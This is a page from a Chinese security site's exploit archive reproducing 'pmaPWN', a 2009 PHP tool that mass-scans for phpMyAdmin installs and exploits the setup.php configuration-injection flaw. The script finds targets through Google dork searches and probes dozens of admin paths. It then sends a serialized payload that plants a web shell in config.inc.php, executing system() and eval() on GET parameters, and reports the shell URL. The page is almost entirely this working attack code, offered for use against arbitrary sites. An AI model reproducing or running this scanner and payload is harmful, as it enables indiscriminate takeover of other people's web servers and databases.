首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit
来源:hacking.expose@gmail.com 作者:d3ck4 发布时间:2009-06-23  

<?php

$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
);

if($argc > 1) {
 print "|****************************************************************|\n";
 print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
 print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
 print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
 print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
 print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
 print "|****************************************************************|\n";
 print "\n";
 print "Usage: php $argv[0] \n";
 exit;
}

 print "|****************************************************************|\n";
 print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
 print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
 print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
 print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
 print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
 print "|****************************************************************|\n";
 print "\n";
 $Handlex = FOpen("pmaPWN.log", "a+");
 FWrite($Handlex, "|****************************************************************|\n");
 FWrite($Handlex, "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
 FWrite($Handlex, "       phpMyAdmin Code Injection RCE Scanner & Exploit\n");
 FWrite($Handlex, "  This is PHP version original http://milw0rm.com/exploits/8921\n");
 FWrite($Handlex, "           credit: Greg Ose, pagvac @ gnucitizen.org\n");
 FWrite($Handlex, "        greetz: Hacking Expose!, HM Security, darkc0de\n");
 FWrite($Handlex, "|****************************************************************|\n\n");
    print "[-] Master, where you want to go today? \n";
 print "[-] example dork: intitle:phpMyAdmin \n";
    fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
    $dork = trim(fgets(STDIN));
    print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
 FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
    for($i = 0; $i <= 900; $i+=100) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
 curl_close($ch);

    if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
 }
 
    foreach($res as $key) {
        foreach($key as $target) {
            $total++;
        }
    }
    print "[+] Done. $total rows return.\n";
 FWrite($Handlex, "[+] Done. $total rows return.\n");
 FClose($Handlex);
    foreach($res as $key) {
        foreach($key as $target) {
   $Handlex = FOpen("pmaPWN.log", "a+");
   $real = parse_url($target);
   $url = "http://".$real['host'];
   print "\n[-] Scanning phpMyAdmin on ".$url."\n";
   FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
   FClose($Handlex);
   sleep(5);
   $curlHandle = curl_multi_init();
   for ($i = 0;$i < count($list); $i++)
   $curl[$i] = addHandle($curlHandle,$url.$list[$i]);
   ExecHandle($curlHandle);
   for ($i = 0;$i < count($list); $i++)
   {   
    $text[$i] =  curl_multi_getcontent ($curl[$i]);
    //echo $url.$list[$i]."\n";
    $Handlex = FOpen("pmaPWN.log", "a+");
    if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
    print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
    print "\n[+] Testing vulnerable, wait sec..\n";
    FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
    FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
     if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
      print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
      FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
     }
    FClose($Handlex);
    exploit_site($url.$list[$i]);
    }
   }
   for ($i = 0;$i < count($list); $i++)//remove the handles
   curl_multi_remove_handle($curlHandle,$curl[$i]);
   curl_multi_close($curlHandle);
   sleep(5);
  }
    }

function addHandle(&$curlHandle,$url)
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_HEADER, 0);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
curl_multi_add_handle($curlHandle,$cURL);
return $cURL;
}
//execute the handle until the flag passed
// to function is greater then 0
function ExecHandle(&$curlHandle)
{
$flag=null;
do {
//fetch pages in parallel
curl_multi_exec($curlHandle,$flag);
} while ($flag > 0);
}

function exploit_site($url) {
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_HEADER, 1);
 curl_setopt($ch, CURLOPT_TIMEOUT, 200);
 curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
 $result = curl_exec($ch);
 curl_close($ch);
 $ch2 = curl_init();
 curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch2, CURLOPT_HEADER, 1);
 curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
 curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
 $result2 = curl_exec($ch2);
 curl_close($ch2);
 //print $url;
 if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  print "\n[+] Exploiting, wait sec..\n";
  $Handlex = FOpen("pmaPWN.log", "a+");
  FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  FClose($Handlex);
  exploit($url);
 }
 else {
  $Handlex = FOpen("pmaPWN.log", "a+");
  print "\n[-] Shit! no luck.. not vulnerable\n";
  FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  FClose($Handlex);
 }
}

 function exploit($w00t) {
  $Handlex = FOpen("pmaPWN.log", "a+");
  $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  //first get cookie + token
  $curl = curl_init();
  curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
  curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);   
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  $result = curl_exec($curl);
  curl_close($curl);
  if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
  
  $token = $matches[1][1];
  if ($token != '') {
  print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  print "\n[+] Sending evil payload mwahaha.. \n";
  FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  $curl = curl_init();
  curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
  curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  curl_setopt($curl, CURLOPT_REFERER, $w00t);
  curl_setopt($curl, CURLOPT_POST, true);
  curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  $result = curl_exec($curl);
  curl_close($curl);
  
  print "\n[!] w00t! w00t! You should now have shell here";
  print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
  print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
  
  }
  else {
   print "\n[!] Shit! no luck.. not vulnerable\n";
   FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
   return false;
  }
  FClose($Handlex);
  if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
  //exit();
 }

?>

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari 3.2.3 Arbitrary Code Ex
·Multiple HTTP Server Low Bandw
·MyBB <= 1.4.6 Remote Code Exec
·Bopup Communications Server 3.
·Multiple Exploiting IE8/IE7 XS
·linux/x86 Shellcode Polymorphi
·NetBSD/x86 kill all processes
·Zen Cart 1.3.8 Remote Code Exe
·Safari on the Apple iPhone suf
·Zen Cart 1.3.8 Remote SQL Exec
·PHP version 5.2.10 has an inva
·HP Data Protector 4.00-SP1b430
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved